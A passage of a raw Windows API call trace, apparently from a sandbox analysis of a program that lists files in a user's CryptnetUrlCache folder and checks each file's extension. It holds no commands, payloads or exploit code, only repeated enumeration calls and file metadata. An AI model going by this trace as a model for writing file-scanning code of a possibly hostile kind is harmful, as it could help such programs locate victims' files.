lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58394060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58394060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.580] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0206.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.581] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0206.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0206.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.581] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0206.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0206.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.581] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0206.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0206.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.581] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbddd270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xd2da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0206.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0206.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.581] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0206.581] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0206.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.581] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0206.584] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0206.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.584] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0206.584] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0206.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.584] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0206.584] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0206.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.584] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0206.584] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0206.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.584] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0206.584] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0206.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, 